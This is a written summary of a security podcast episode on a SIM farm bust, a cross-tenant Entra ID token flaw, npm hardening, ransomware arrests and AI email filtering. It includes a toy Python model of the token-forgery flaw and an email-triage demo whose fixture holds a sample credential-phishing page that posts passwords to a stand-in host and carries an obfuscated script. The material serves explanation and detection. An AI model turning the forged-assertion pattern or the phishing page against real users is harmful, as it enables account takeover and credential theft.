Risky Business #808 — "Insane megabug in Entra left all tenants exposed"
Date: September 24, 2025
Host: Patrick Gray
Guest Co-Host: Rob Joyce (former NSA, current security advisor)
Sponsor Interview: Josh Kamdjou, CEO & Co-Founder of Sublime Security
Episode Overview
This episode covers a wide array of recent infosec news, focusing on a covert communications takedown, a critical vulnerability in Microsoft Entra ID (formerly Azure AD), post-disruption ransomware trends, and AI's rapidly evolving role in security products. Host Patrick Gray is joined by former NSA senior official Rob Joyce for nuanced insight, while the latter part features a deep dive with Sublime Security's Josh Kamdjou on pragmatic AI deployment in email threat detection.
Main News & Analysis
[00:08] Covert SIM Farm Takedown in New York
Key Details:
- The US Secret Service dismantled a massive covert "SIM farm" operation spanning abandoned NYC apartments, featuring over 300 SIM servers and 100,000 SIM cards.
- Used for encrypted messaging, possible DDoS attacks, and sending menacing messages to US government officials.
- Suspected links to foreign governments, organized crime, drug cartels, and human trafficking.
- Current forensic efforts are focused on tracing SIM card origins.
Insight:
- Rob Joyce emphasized operational discipline failures and theorized this was multipurpose infrastructure, possibly contracted for nation-state use but also "moonlighted" for other criminal purposes:
"Some people don't have the discipline they really need in nation state espionage...We may find this was like a contracted effort...and they used it, but they didn't know what was moonlighting on top of that network." — Rob Joyce [04:17]
- The abundance of SIM cards is expected to be the operation's undoing because of traceability:
"...those SIM cards are going to be the downfall of this operation because it's really hard to get SIM cards in large quantities...they'll be able to follow the money and follow the accounts..." — Rob Joyce [05:37]
[07:06] MI6 Rolls Out Tor Onion Service
Key Details:
- The UK’s MI6 launched a Tor Onion service to facilitate confidential tips from potential collaborators.
- MI6 openly acknowledged the risk of even viewing their YouTube instructions in repressive countries.
Analysis:
- Patrick questions the wisdom of using Tor in high-surveillance environments.
- Rob Joyce notes a history of problematic US attempts, drawing parallels to the CIA's earlier (flawed) tip operations, but says diversifying contact channels remains important:
"There's a lot of reasons that [this] is…challenging...But I think they're going to try a wide and diverse set of ways to allow that their sources to get in connection." — Rob Joyce [09:43]
- Both note similarities between intelligence work and journalism in managing noisy "tip lines":
"Every time I talk to someone from the intelligence community, there are so many aspects...that are so similar to journalism." — Patrick Gray [10:19]
[11:06] Microsoft Entra ID (Azure AD) Megabug
Key Details:
- Security researcher Dirk-jan Mollema discovered a critical flaw in how Microsoft Entra ID validated legacy service-to-service tokens:
- An attacker holding a valid "Actor" token for their own tenant could attach an impersonation assertion naming any user in any other tenant, including Global Administrators; the legacy Azure AD Graph API did not check that the asserted tenant matched the tenant the signed token had been issued for.
- The attack largely bypassed logging/audit: token issuance and reads left no trace in the victim tenant, and any changes were recorded as actions by the impersonated admin, so the compromise looked like legitimate admin activity.
- Microsoft patched the flaw server-side and assigned CVE-2025-55241.
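As an added illustration of the bug class (not Microsoft's token format or code, which are far more involved), the following Python models a signed service-to-service token carrying an unsigned impersonation assertion. One verifier checks the asserted tenant only against the resource tenant; the other also binds it to the tenant the signed token was issued for. The signing key, claim names, tenant and service names are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo key standing in for the token service's signing key.
STS_KEY = b"demo-sts-signing-key"


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_service_token(service: str, tenant: str) -> str:
    """Signed outer token: the token service vouches that `service` is
    trusted to act within `tenant`. Claim names are illustrative."""
    claims = {"iss": "sts", "sub": service, "tid": tenant}
    body = _b64(json.dumps(claims, sort_keys=True).encode())
    sig = _b64(hmac.new(STS_KEY, body.encode(), hashlib.sha256).digest())
    return f"{body}.{sig}"


def wrap_impersonation(service_token: str, tenant: str, user: str) -> str:
    """Append an UNSIGNED impersonation assertion. The holder of the service
    token fills in any tenant and user it likes; nothing vouches for it."""
    inner = {"tid": tenant, "upn": user}
    return f"{service_token}.{_b64(json.dumps(inner, sort_keys=True).encode())}"


def _parse(token: str):
    """Verify the outer signature and return (outer_claims, inner_claims)."""
    body, sig, inner = token.split(".")
    expected = hmac.new(STS_KEY, body.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(_unb64(sig), expected):
        raise ValueError("bad outer signature")
    return json.loads(_unb64(body)), json.loads(_unb64(inner))


def validate_vulnerable(token: str, resource_tenant: str):
    """Checks the asserted tenant only against the resource being accessed,
    never against the tenant the signed token was issued for."""
    _outer, inner = _parse(token)
    if inner["tid"] != resource_tenant:
        return None
    return inner["upn"]


def validate_hardened(token: str, resource_tenant: str):
    """Binds the unsigned assertion to the signed claims: the outer token
    must be for this tenant, and the inner tenant must match it."""
    outer, inner = _parse(token)
    if outer["tid"] != resource_tenant or inner["tid"] != outer["tid"]:
        return None
    return inner["upn"]


def demo() -> dict:
    attacker_tenant, victim_tenant = "attacker.example", "victim.example"
    # The attacker legitimately obtains a service token for their own tenant...
    svc = issue_service_token("attacker-app", attacker_tenant)
    # ...then asserts an admin in someone else's tenant.
    forged = wrap_impersonation(svc, victim_tenant, "globaladmin@victim.example")
    legit = wrap_impersonation(svc, attacker_tenant, "user@attacker.example")
    # Rewriting the signed outer claims is caught by the signature check;
    # the weakness is the unsigned inner assertion, not the signature.
    _body, sig, inner = forged.split(".")
    tampered_claims = {"iss": "sts", "sub": "attacker-app", "tid": victim_tenant}
    tampered = _b64(json.dumps(tampered_claims, sort_keys=True).encode())
    try:
        validate_hardened(f"{tampered}.{sig}.{inner}", victim_tenant)
        outer_tamper_rejected = False
    except ValueError:
        outer_tamper_rejected = True
    return {
        "vulnerable_forged": validate_vulnerable(forged, victim_tenant),
        "hardened_forged": validate_hardened(forged, victim_tenant),
        "hardened_legit": validate_hardened(legit, attacker_tenant),
        "outer_tamper_rejected": outer_tamper_rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point the demo makes is the one in the quotes above: the signature on the outer token is intact, so the request looks like a trusted service acting for a real admin, and only the missing binding between the signed tenant and the asserted tenant lets an attacker's own token reach into every other tenant.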
Impact:
- Every Entra ID tenant (effectively, every Azure AD customer) was briefly vulnerable to total compromise ("God mode" per Rob Joyce).
Notable Quotes:
- "This meant, yeah, full compromise of every single Entra ID tenant on the planet. This is like a 10 out of 10 megabug." — Patrick Gray [12:31]
- "It certainly is a God mode token...Bypassed logging because it said an admin did this and the assumption was it was your admin in your tenant, not a phantom admin..." — Rob Joyce [12:54]
Evaluation:
- Both acknowledge Microsoft has improved security post-CSRB review, but legacy architectures and technical debt remain a core risk.
- Patrick:
"...they've sort of got this massive technical debt problem...it's kind of too late. Right?" [15:23]
[16:50] NPM/GitHub Supply Chain Security
Key Details:
- Following the Shai-Hulud worm, GitHub is moving toward FIDO-based MFA for npm package publication and a trusted publishing system using short-lived OIDC tokens instead of long-lived publish tokens.
- These steps are meant to curb key theft and publishing automation abuse.
Discussion:
- Rob Joyce supports the changes:
"...multi factor hardware tokens aren't invulnerable either, but they raise the bar a lot for the attackers." [17:14]
- Both agree attackers will still seek endpoints to compromise, but the changes shrink windows of opportunity.
[18:22] Major Ransomware Events and Scattered Spider Takedown
Key Incidents:
- Ransomware disruptions at Collins Aerospace (Heathrow, Brussels, Dublin, Berlin flights delayed/canceled); Jaguar Land Rover and Marks & Spencer also targeted.
- Law enforcement crackdown leads to arrests of "Scattered Spider" members—predominantly Western teenagers/young adults.
- US DOJ indictments revealed ransom payments up to $115 million, including a massive bitcoin haul likely tied to ICBC, the world's largest bank.
Trends and Analysis:
- Law enforcement pressure has pushed ransomware activity from hard-to-reach Eastern European actors toward Western (UK/US) youth, who are far easier to apprehend.
- The group's OPSEC failures, quirks, and indirect boasts hastened their downfall.
- Rob Joyce:
"This is the snowball rolling downhill. Right. It just rolls right over people and scoops them into this big ball…as you get people to turn, they will turn on the associates…" [24:10]
- Significant collateral damage from ransomware: e.g., a JLR supply chain partner's 55% stock loss and extended production pauses with real downstream impact:
"You talk on the knock on I, I read something that said, you know, Jaguar has 33,000 employees, but there's two supply chain. Ottens and, and others...the knock on effects are huge." — Rob Joyce [29:11]
[30:15] US Surveillance & Info Sharing Laws in Peril
- Section 702 FISA reauthorization comes up again (the current authority expires in April 2026). Both stress that a lapse would severely harm national defense and cyber operations:
"It would be a huge hit to a lot of the things we're talking about…it is an amazing tool..." — Rob Joyce [31:10]
- The Cybersecurity Information Sharing Act of 2015, the legal foundation for liability-protected threat sharing with CISA and between companies, is also at risk of lapsing (it sunsets on September 30, 2025), with potentially dire consequences for collaborative defense.
- Rob Joyce:
"...I'm hoping we get the CISA renewal long before we're fighting over, you know, any of the section 702 renewals." [32:03]
Sponsor Interview: Josh Kamdjou, CEO of Sublime Security
[38:55–51:35]
Topic: Scalable, AI-Augmented Email Security — Where Does “Agentic” AI Actually Help?
Key Points
- Scaling AI: You can't send every inbound email through a large language model or full autonomous analysis. The compute cost is prohibitive, and most messages are benign.
- Two-Layer Approach:
- Layer 1 (DSL/MQL): Lightweight, programmable query language for rapid behavioral filtering based on environment-specific "suspicion" indicators.
- Layer 2 (AI/Agents): Only flagged messages are escalated for in-depth agentic (AI/LLM) analysis, which determines the final action.
- Example Use Cases:
- An HTML attachment from a first-time sender with a new domain isn't always malicious, but it is suspicious enough to warrant further scrutiny.
- Layer 1 is responsible for "binning" obvious threats; Layer 2 handles the nuanced investigation.
- Automation and Adaptivity: Kamdjou stresses that no detection is perfect, since adversaries constantly innovate, and that their AI agents (ADE, ASA) are designed to close detection gaps far faster than retraining traditional models:
"No matter how good our detections or models are today, there will always be something that gets through...So the question is, what then? ...That's why we created ADE, to automate that whole process and bring the time to closing gaps…from weeks or months...to hours." — Josh Kamdjou [42:34]
- Customization and Context: Each installation of Sublime evolves its rules to match local context; "no two environments are the same."
"There's a different lock on every house. You learn to pick one lock and you still, you don't know what's happening at the other house." — Josh Kamdjou [44:36]
- Compute Costs: SaaS customers' compute costs for AI agents are absorbed by Sublime; on-prem customers pay their own. Efficient filtering and DSL logic keep the cost manageable.
- Agent Role: LLM/AI agents are "tool users," not the tools themselves: structured, deterministic workflows powered by expressive filtering and analysis logic, not freeform LLM reasoning.
"You want your agents to use the tools, not be the tools. Right?" — Patrick Gray [47:26]
- Behavioral vs. IOC Detections: ADE's next evolution is to automatically generate specific (stopgap) and general (behavioral) rules in parallel, covering both the immediate threat and future attacker variations.
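To make the two-layer idea concrete, here is an added Python illustration. It is not Sublime's MQL, ADE or agent code, whose real rules and models look nothing like this: a cheap stage-1 pass over every message produces suspicion signals, only the suspicious messages are escalated to a more expensive stage-2 scan (a heuristic HTML-attachment check stands in for the LLM/agent investigation), and a specific stopgap IOC rule sits beside a general behavioral rule for the same technique. The known-sender list, domain ages, blocklist and sample messages are constructed.

```python
import re
from dataclasses import dataclass


@dataclass
class Message:
    sender: str
    subject: str
    attachments: list  # [(filename, content_bytes)]


@dataclass
class Environment:
    known_senders: set     # senders this tenant has exchanged mail with before
    domain_age_days: dict  # stand-in for a domain-age lookup (constructed)
    blocked_domains: set   # stopgap IOC rule: exact domains from a known campaign


def sender_domain(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower()


def is_html(filename: str) -> bool:
    return filename.lower().endswith((".htm", ".html"))


def stage1_signals(msg: Message, env: Environment) -> list:
    """Layer 1: cheap, deterministic checks that run on every message."""
    signals = []
    domain = sender_domain(msg.sender)
    if domain in env.blocked_domains:
        signals.append("ioc:blocked_domain")  # specific (stopgap) rule
    if msg.sender.lower() not in env.known_senders:
        signals.append("first_time_sender")
    if env.domain_age_days.get(domain, 0) < 30:
        signals.append("new_domain")
    if any(is_html(name) for name, _ in msg.attachments):
        signals.append("html_attachment")
    return signals


CRED_FORM = re.compile(rb"<input[^>]+type\s*=\s*['\"]?password", re.I)
OBFUSCATION = re.compile(rb"\b(atob|unescape|fromCharCode)\s*\(", re.I)


def stage2_analysis(msg: Message):
    """Layer 2: expensive per-message work, run only on escalations.
    A heuristic HTML scan stands in for the LLM/agent investigation."""
    findings = []
    for name, content in msg.attachments:
        if not is_html(name):
            continue
        if CRED_FORM.search(content):
            findings.append("credential_form")
        if OBFUSCATION.search(content):
            findings.append("js_obfuscation")
    return ("block" if findings else "deliver"), findings


def triage(msg: Message, env: Environment):
    """Returns (verdict, signals, escalated_to_stage2)."""
    signals = stage1_signals(msg, env)
    if any(s.startswith("ioc:") for s in signals):
        return "block", signals, False  # binned at layer 1, no AI spend
    # General (behavioral) rule: HTML attachment from an unfamiliar or new sender.
    suspicious = "html_attachment" in signals and (
        "first_time_sender" in signals or "new_domain" in signals)
    if not suspicious:
        return "deliver", signals, False
    verdict, findings = stage2_analysis(msg)
    return verdict, signals + findings, True


# Constructed sample environment and mail.
ENV = Environment(
    known_senders={"alice@partner.example"},
    domain_age_days={"partner.example": 4000, "phish-kit.example": 3,
                     "other-new.example": 2, "fresh-vendor.example": 5},
    blocked_domains={"phish-kit.example"},
)
PHISH_HTML = (b'<html><body><form action="https://collect.example/p">'
              b'<input name="user"><input type="password" name="pw"></form>'
              b'<script>eval(atob("ZG9jdW1lbnQ="))</script></body></html>')
BENIGN_HTML = b"<html><body><h1>Welcome</h1><p>Your order shipped.</p></body></html>"
SAMPLES = [
    Message("alice@partner.example", "Invoice", [("invoice.pdf", b"%PDF-1.4")]),
    Message("billing@phish-kit.example", "Overdue", [("notice.html", PHISH_HTML)]),
    Message("it@other-new.example", "Password expiry", [("reset.html", PHISH_HTML)]),
    Message("news@fresh-vendor.example", "Welcome", [("welcome.html", BENIGN_HTML)]),
]


def run_demo(env=ENV, messages=SAMPLES) -> dict:
    """Maps subject -> (verdict, escalated) so the gating effect is visible."""
    results = {}
    for m in messages:
        verdict, _signals, escalated = triage(m, env)
        results[m.subject] = (verdict, escalated)
    return results


if __name__ == "__main__":
    for subject, (verdict, escalated) in run_demo().items():
        print(f"{subject:16} {verdict:8} escalated={escalated}")
```

Of the four sample messages only two reach stage 2, which is the cost argument in a nutshell. The "Overdue" message is caught by the stopgap domain rule without any expensive analysis, while the "Password expiry" variant from a domain the blocklist has never seen is still caught because the behavioral rule escalates it and the deeper scan finds the credential form; the benign HTML newsletter is escalated and then delivered, which is the false-positive cost of a broad behavioral rule.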
Notable Quotes
- "This meant, yeah, full compromise of every single Entra ID tenant on the planet. This is like a 10 out of 10 megabug." — Patrick Gray [12:31]
- "Some people don't have the discipline they really need in nation state espionage and nation state activities." — Rob Joyce [04:17]
- "I do think our operating systems and our browsers and our cell phones are going to get much, much more protections through this [AI]. But there's so much legacy tech...It's like the forest fire that comes through and cleans. It gets rid of all...But, you know, if your house gets burned down, it's not great that the new one's going to be...shiny and new." — Rob Joyce [35:04]
- "We suck at patching. So if you identify all these vulnerabilities, we're going to have a hard time of just locking the doors and windows." — Rob Joyce [36:41]
- "There's a different lock on every house. You learn to pick one lock and you still, you don't know what's happening at the other house." — Josh Kamdjou [44:36]
Timestamps of Key Segments
- Covert SIM farm bust — [01:08–06:39]
- MI6 Tor Onion service — [07:06–10:19]
- Microsoft Entra ID megabug — [11:06–15:23]
- NPM supply chain security (GitHub/MFA) — [16:50–18:22]
- Major ransomware (Collins Aerospace, JLR, Scattered Spider) — [18:22–29:44]
- U.S. surveillance/info sharing statutes in jeopardy (702, CISA) — [30:15–33:57]
- Sponsor interview: Pragmatic AI for email security (Josh Kamdjou/Sublime Security) — [38:55–51:35]
Wrap-Up
This episode encapsulates the turbulent intersection of cyberthreats, law enforcement, policy, and evolving technology. Standout moments include the jaw-dropping “God mode” bug in Microsoft Entra ID, high-impact ransomware hitting the physical world, and clear-eyed skepticism about AI’s security promise and peril.
If you want a grounded, expert-driven take on where security is breaking and how defenders are trying to keep up—with all the sharp, unscripted candor that makes Risky Business essential—this episode delivers it in spades.
